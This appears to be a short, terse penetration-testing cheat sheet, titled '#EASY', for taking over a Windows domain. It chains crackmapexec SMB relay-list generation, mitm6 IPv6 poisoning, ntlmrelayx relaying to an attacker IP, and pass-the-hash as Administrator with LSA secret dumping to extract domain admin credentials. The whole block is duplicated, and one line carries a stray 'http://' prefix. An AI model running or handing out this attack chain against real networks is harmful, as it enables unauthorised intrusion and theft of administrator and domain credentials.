#EASY
cme smb $hosts --gen-relay-list relay.txt
mitm6 -i eth0 -d $domain
http://ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt
extract "Admin" hash
cme smb $hosts -u Administrator -H $hash -d LOCALHOST --lsa
cp /root/.cme/logs/*.secrets |sort -u
extract DA cred
cme smb $hosts --gen-relay-list relay.txt
mitm6 -i eth0 -d $domain
http://ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt
extract "Admin" hash
cme smb $hosts -u Administrator -H $hash -d LOCALHOST --lsa
cp /root/.cme/logs/*.secrets |sort -u
extract DA cred